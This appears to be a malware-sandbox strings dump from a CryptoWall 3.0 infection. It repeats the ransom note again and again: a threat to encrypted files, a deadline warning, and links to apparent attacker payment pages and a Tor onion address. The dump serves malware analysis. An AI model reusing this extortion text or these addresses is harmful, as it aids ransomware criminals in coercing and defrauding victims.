Source: restore_files_gpmus.html268.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt383.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html213.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt68.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt266.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html325.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt55.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html1.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt252.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html297.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html327.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt193.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html141.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html369.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt315.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html232.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt46.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt179.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt117.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html45.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html291.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt203.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html305.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" 